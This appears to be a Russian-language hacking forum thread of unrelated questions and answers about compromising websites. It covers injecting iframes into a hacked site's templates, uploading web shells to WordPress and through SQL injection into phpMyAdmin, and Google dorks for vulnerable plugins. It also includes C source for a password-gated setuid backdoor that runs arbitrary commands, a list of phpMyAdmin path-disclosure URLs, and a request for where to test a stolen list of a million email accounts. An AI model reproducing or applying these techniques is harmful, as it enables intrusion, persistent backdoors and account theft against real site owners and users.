Ребят объясните непонятное, есть easymod в phpbb он криптует пасс через функцию crypt_ftp_pass http://svn2.assembla.com/svn/evilmods/2.0/quickinstall/trunk/store/easymod/admin/em_includes/em_functions.php И хранит его в бд, НО возникает вопрос, каким макаром тогда конектится скрипт должен быть чистый пасс гдето, нетакли? Как будет он декодировать его при подключении?
Должна быть прописана гдето функция декриптовки и эта вункция декриптуя пасс присваевается переменной, которая в следствии и выполняет конект!
Несколько вопросов. 1) Как сделать так, чтобы фрейм был не только на индексе, но и на остальных разделах сайта? Например, обхватывал еще форум или админскую панель 2) Реально ли залить шелл в WP ( версия 3.3) с правами модератора, то есть в theme_editor не пускает. Остальное вроде все есть.
ответ на 1 вопрос: правь шаблон, если шаблон 1 на всех страницах где используется данный шаб будет твой фрейм. на второй вопрос: думаю что нет, права админа нужны
Code: inurl:"wp-login.php?action=register" inurl:"plugins/wp-forum" "index of /" wp-forum Хотя бы так...
такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?
Скомпилируйте суидник на FreeBSD: Code: #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { if(argc == 3){ if(strcmp(argv[1],"cool_pass") == 0){ setgid(310); setuid(16745); system(argv[2]); } } return 0; }
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться... P.S: вот список дефолтных логов можешь тут взглянуть https://forum.antichat.ru/thread49775-default.html еще также может гугл помочь с раскрытием путей попробуй дорк такого плана
ищи phpinfo или запросы которые могут привести к раскрытию путей Code: Full path disclosure : /sсriрts/check_lang.php /themes/darkblue_orange/layout.inc.php /index.php?lang[]= /index.php?target[]= /index.php?db[]= /index.php?goto[]= /left.php?server[]= /index.php?table[]= /server_databases.php?token=your_token&sort_by=" /index.php?db=information_schema&token=your_token&tbl_group[]= /db_printview.php?db=" /sql.php?back[]= libraries/string.lib.php libraries/storage_engines.lib.php libraries/sqlparser.lib.php libraries/sql_query_form.lib.php libraries/select_theme.lib.php libraries/select_lang.lib.php libraries/relation_cleanup.lib.php libraries/left_header.inc.php libraries/import.lib.php libraries/header_meta_style.inc.php libraries/grab_globals.lib.php libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo) libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo) libraries/display_import.lib.php libraries/display_export.lib.php libraries/display_create_table.lib.php libraries/display_create_database.lib.php libraries/db_table_exists.lib.php libraries/database_interface.lib.php libraries/common.lib.php libraries/check_user_privileges.lib.php libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true) libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE) libraries/import/sql.php libraries/fpdf/ufpdf.php libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
